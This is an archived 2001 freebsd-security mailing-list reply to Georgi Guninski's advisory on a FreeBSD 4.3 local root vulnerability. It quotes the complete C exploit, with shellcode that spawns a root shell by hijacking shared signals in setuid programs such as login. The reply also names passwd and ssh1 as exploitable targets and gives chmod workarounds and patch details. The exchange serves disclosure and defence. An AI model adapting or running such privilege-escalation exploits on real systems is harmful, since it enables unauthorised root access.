From owner-freebsd-security  Wed Jul 11  1:20: 3 2001
Delivered-To: freebsd-security@freebsd.org
Received: from staff.rinet.ru (staff.rinet.ru [195.54.192.46])
	by hub.freebsd.org (Postfix) with ESMTP id 118AC37B401
	for <security@freebsd.org>; Wed, 11 Jul 2001 01:19:52 -0700 (PDT)
	(envelope-from gvs@rinet.ru)
Received: from localhost (localhost [127.0.0.1])
	by staff.rinet.ru (8.11.3/8.11.3) with ESMTP id f6B8JdG98982;
	Wed, 11 Jul 2001 12:19:39 +0400 (MSD)
	(envelope-from gvs@rinet.ru)
Date: Wed, 11 Jul 2001 12:19:39 +0400 (MSD)
From: Seva Gluschenko <gvs@rinet.ru>
X-X-Sender:  <gvs@localhost>
To: Bug Track <bugtraq@securityfocus.com>
Cc: <security@freebsd.org>
Subject: Re: FreeBSD 4.3 local root
In-Reply-To: <3B4B0E7B.1492C76A@guninski.com>
Message-ID: <20010711121224.J96652-100000@localhost>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Message from Georgi Guninski at Jul 10 17:17 in parts:

GG> Systems affected:
GG> FreeBSD 4.3 and probably earlier versions.

Confirmed for 3-STABLE

GG> Exploit:
GG>
GG> Examine the source and don't send me mail if you get SEGV.

well, actually, your native exploit doesn't work due to a little
"mistake" inside ;)

But, it was easy to correct %|

Well, after a bunch of tests I've found only two suids which gave me
suid shell:

/usr/bin/passwd
/usr/local/bin/ssh1

a lot of others, including login/rlogin, gave me either a nonsuid
shell or just coredump (which is worse, of course).

So, quick workaround should be

chmod o-rx /usr/bin/passwd
chmod u-s /usr/local/bin/ssh1

Of course, it does NOT save the system in general but can
significantly decrease the first step risk.

GG> http://www.guninski.com/vvfreebsd.c
GG>
GG> -------------vvfreebsd.c----------------------
GG>
GG> /*
GG> FreeBSD 4.3 local root exploit using shared signals.
GG> Written by Georgi Guninski http://www.guninski.com
GG> */
GG>
GG> #include <stdio.h>
GG> #include <signal.h>
GG> #include <unistd.h>
GG> int vv1;
GG>
GG> #define MYSIG SIGINT
GG>
GG>
GG> //exec "/tmp/sh", shellcode gotten from the internet and modified
GG> unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
GG> "\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
GG> "\x31\xc0\x50\x50\xb0\x17\xcd\x80"
GG> "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
GG>                   "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
GG>                   "\xb0\x3b\x50\xcd\x80\x90\x90\x90";
GG>
GG> typedef (*PROG)();
GG> extern char **environ;
GG>
GG> int main(int ac,char **av)
GG> {
GG> int pid;
GG> //(*(PROG)bsdshell)();
GG> if(!(vv1=getenv("vv")))
GG>  {
GG>   setenv("vv",bsdshell,1);
GG>   if(!execle(av[0],"vv",NULL,environ))
GG>    {
GG>     perror("weird exec");
GG>     exit(1);
GG>    }
GG>  }
GG>
GG> printf("vvfreebsd. Written by Georgi Guninski\n");
GG> printf("shall jump to %x\n",vv1);
GG>
GG> if(!(pid=rfork(RFPROC|RFSIGSHARE)))
GG>  {
GG>   printf("child=%d\n",getpid());
GG> // /usr/bin/login and rlogin work for me. ping gives nonsuid shell
GG> //  if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
GG>   if(!execl("/usr/bin/login","login",0))
GG>    {
GG>     perror("exec setuid failed");
GG>     exit(2);
GG>    };
GG>  }
GG> sleep(2);
GG> signal(MYSIG,(sig_t)vv1);
GG> sleep(2);
GG> kill(pid,MYSIG);
GG> printf("done\n");
GG> while(42);
GG> }
GG>
GG>
GG>
GG>
GG> ----------------------------------------------
GG>
GG> Workaround/Soltution:
GG> As far as I know patches for this problem are commited for both
GG> -current and -stable.
GG> >From "CVS log for src/sys/kern/kern_exec.c"
GG> [MFC: do not share sigs after an exec]
GG> The main diff seems to be at:
GG> http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/kern/kern_exec.c.diff?
GG> r1=1.107.2.7&r2=1.107.2.8&f=h
GG>
GG> Vendor status:
GG> FreeBSD was informed on 2 July 2001 (sent them broken attachment on 1
GG> July).
GG>
GG> Some comparison of vendor response times from my personal experience:
GG> FreeBSD seem to have fixed this in 7 days.
GG> OpenBSD fixed my previous advisory in 6 days.
GG> Microsoft are much slower.
GG>
GG> Regards,
GG> Georgi Guninski
GG> http://www.guninski.com
GG>

SY, Seva Gluschenko, just stranger on The Road. | http://gvs.rinet.ru/
Cronyx Plus / RiNet network administrator.      | GVS-RIPE | GVS3-RIPN


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message